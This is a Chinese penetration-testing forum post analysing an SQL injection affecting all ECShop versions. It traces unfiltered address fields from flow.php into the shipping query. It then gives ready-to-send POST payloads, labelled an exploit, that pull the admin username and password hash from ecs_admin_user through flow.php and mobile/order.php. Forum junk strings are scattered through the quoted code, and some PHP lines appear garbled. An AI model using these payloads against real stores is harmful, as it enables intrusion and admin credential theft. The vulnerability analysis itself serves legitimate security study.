中国网络渗透测试联盟

标题: ecshop全版本注入分析 [打印本页]

---

作者: admin    时间: 2013-1-13 09:48
标题: ecshop全版本注入分析
前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。

4 [5 n7 i9 S# Y( x  p6 R2 s    漏洞关键文件：
% }6 g& P* l) K2 j
    /includes/lib_order.php

2 b% I7 N2 |/ R' N" w" J+ v+ E    关键函数：

/ M$ M2 S4 k: Q7 n
0 R- S/ _9 a- _5 ?3 ^9 a
7 T3 a$ |) a; Q! @" s/ E9 T01     function available_shipping_list($region_id_list)
2 }: f. X( I) e/ M7 v& H
02 {

- r, @0 R% U% r03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .
# `$ c* o+ r  j  z* z
04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .
3 I. E( f. v5 A5 ^% e! D
' Q$ N: W: S5 g! D05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .
1 S& H2 {7 o8 G9 l6 Q
6 z  ?" l) r1 S* K06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .

6 W; N5 a! E1 M  m07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.
2 o% B& }0 n8 e; B6 M1 I
08             'WHERE r.region_id ' . db_create_in($region_id_list) .

09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';
4 ?% ^+ k5 f% H
10   
0 c# u& Y+ ]/ _* |
2 d4 w' H) Z! W6 w; h11     return $GLOBALS['db']->getAll($sql);

! Z& n: M. J8 Q) ^+ ?9 r0 D12 }

显然对传入的参数没有任何过滤就带入了查询语句。
" |* I  Z9 }/ D2 y
下面我们追踪这个函数在flow.php中：
# ^9 E6 ^' }. V. X' O1 H/ ^$ s( y0 } 第531行：   

1 $shipping_list     = available_shipping_list($region);

# y' D1 _9 W  W9 |- i+ o# Q% ~' D
1 Y7 M/ b: R4 h. Z* i9 O


$ a: T/ R3 U( m8 z- h. ]再对传入变量进行追踪：
( z/ Q5 M, c- B6 m6 }( T& T4 H, u
第530行：   

1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);


# i$ r, B( o, ]/ O
% m0 x9 P5 t" k7 [- \
- k" ~# [* V1 I, }6 J5 x0 Z
: |  I; l0 G' q9 `- G1 h5 k* d5 F第473行：        
1 Z3 `8 B1 I% }6 K
8 F- Y' M$ m( O: I) s% i  v1 $consignee = get_consignee($_SESSION['user_id']);
+ q+ H( s& l9 E: l. S! w8 ]
* G8 g* X3 @" S% @4 P' l$ M到了一个关键函数：
. Q' U" i, |( U+ E- Q4 [
/includes/lib_order.php
6 d2 \9 O. h( o' i0 A0 F0 K
, k1 B+ ^0 Y, a1 K/ v



( ^$ N& J9 j. z7 S+ r( m4 V01 function get_consignee($user_id)

02 {

03     if (isset($_SESSION['flow_consignee']))

3 V" \2 s. l1 H7 N' U. `04     {
* W* W0 ?% [- c- }. o$ H: ~
05         /* 如果存在session，则直接返回session中的收货人信息 */
& q0 E/ Q2 A- |+ T
' g5 C6 b, [% l: {& G, h; g- ^; M06   

07         return $_SESSION['flow_consignee'];
- m7 t8 g; s9 i+ y+ r
08     }
$ |8 I# _  \3 p9 X# |1 B
09     else

10     {

, k6 ~( {3 S: x/ [11         /* 如果不存在，则取得用户的默认收货人信息 */

* p" C8 Y5 m$ {: E9 \* ^12         $arr = array();

' \, ]2 s6 X6 {13   

14         if ($user_id > 0)
& |$ t- X8 N) R
8 a! l5 g4 K  T8 ^2 S- ]: D$ }15         {
& J( B5 p, g- P
16             /* 取默认地址 */

17             $sql = "SELECT ua.*".

18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.
# S. d. s6 s, [: r; F; l  |) ?. n8 U
7 j4 r. T. k$ x6 Z# j; n19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
9 V) V) L% m  S" D8 @
: x) G1 e0 q2 \; [20   
6 z$ q( V$ t% L4 v! t1 T
21             $arr = $GLOBALS['db']->getRow($sql);

22         }

* R* n5 W4 W" G* o23   

6 \) ^  e" c1 Q" @4 a% v24         return $arr;

: T2 E9 c$ q+ X; f1 n  \' }25     }

26 }
. o3 g1 v; V' r2 ?) L+ F" a/ \
显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？
/ W' u6 ?  L+ }  r; c3 t
' k- J7 C% y) @1 [

# v6 s! ]' ]5 n( L关键点:

第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);
7 h- S' p! l) z: O& N  j
, \& \" v" g2 _这里对传入参数反转义存入$_SESSION中。
8 Y; e! J0 @; u

+ n" _8 p' h6 Z0 l
$ f, |8 [, Z6 Q* Q" X$ K$ E6 h然后看下：

5 k' V) T! L* ~/ a3 C% T) i7 n

   
4 a" G) f; s  ~% v! m( g
01 $consignee = array(

6 H* r: f+ c) g3 C' V5 |( f02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),
+ U. Y4 U' i3 K; Q: E" B
$ J9 r+ A( Y' e+ u03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),

& A  L0 S$ J2 D04         'country'       => empty($_POST['country'])    ? '' _POST['country'],

05         'province'      => empty($_POST['province'])   ? '' _POST['province'],

( y5 k) l4 z, P- w, P3 _7 M% Z06         'city'          => empty($_POST['city'])       ? '' _POST['city'],

& G: M# u& m  r3 I3 R07         'district'      => empty($_POST['district'])   ? '' _POST['district'],
4 R$ n6 u  X+ T  [  K! m5 c& \" Y
08         'email'         => empty($_POST['email'])      ? '' _POST['email'],
3 l2 V1 P7 F6 p7 `# m
09         'address'       => empty($_POST['address'])    ? '' _POST['address'],
% m. A9 Y  A& ?" X- l- v/ U2 n
10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),

2 v: y- X$ r$ [* m11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),
" k: }" q# ]' G4 s5 A' U
12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),
4 H/ d: @, M, X( \. W
13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],
( f  x  c) ^/ E/ F& O: x* q
14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],

" v+ n/ m8 Z& N* R- M  H1 p15     );

好了注入就这样出现了。

" W7 L$ h+ I1 q9 w5 t; o5 O6 T) G9 v==================
+ Z. F% n$ S, Q
注入测试：
5 X9 j' u# H- u5 d( Y" n
环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)

& t/ Z3 F+ \1 Y% b/ x! V5 ]. I测试程序：ECShop_V2.7.3_UTF8_release1106

: x, N$ C$ `& ^% V: ]4 Q6 P
2 G/ ^& S' P- _+ F
1.首先需要点击一个商品加入购物车
( U4 m2 C% z% F9 u6 g
# i3 t$ q! A7 b1 A- j- U( q5 M2.注册一个会员帐号
. i% Q5 {7 T' [. j4 O8 X0 z3 h
3.post提交数据
4 _0 p1 R6 y9 ?1 C3 E
  e  r6 X' e+ \4 u: U6 o
- G! L' Q0 x7 z% E
1 http://127.0.0.1/ecshop/flow.php

2   

3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
举一反三，我们根据这个漏洞我们可以继续深入挖掘：

我们搜寻关键函数function available_shipping_list()
# c. J' y6 }7 T7 f3 m) f
; a6 B8 I5 @1 ~! R' f2 a' G在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同

利用exp:
& ]6 f$ i* T9 U3 w: j
# e- I5 r# s. A$ Q1.点击一个商品，点击购买商标
- a0 ^1 a+ c1 y9 S
2 Y8 ]2 q7 Z1 d8 E: E2.登录会员帐号

3.post提交：

http://127.0.0.1/ecshop/mobile/order.php

8 l9 ~5 s' O- N: S0 D" F
* L8 @. i" E3 V( U0 O$ j2 E
5 e4 w+ ?1 R/ m$ G7 ]3 u* M2 ncountry=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=
; N" \# t$ z8 M2 ?5 ~- ~+ P

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2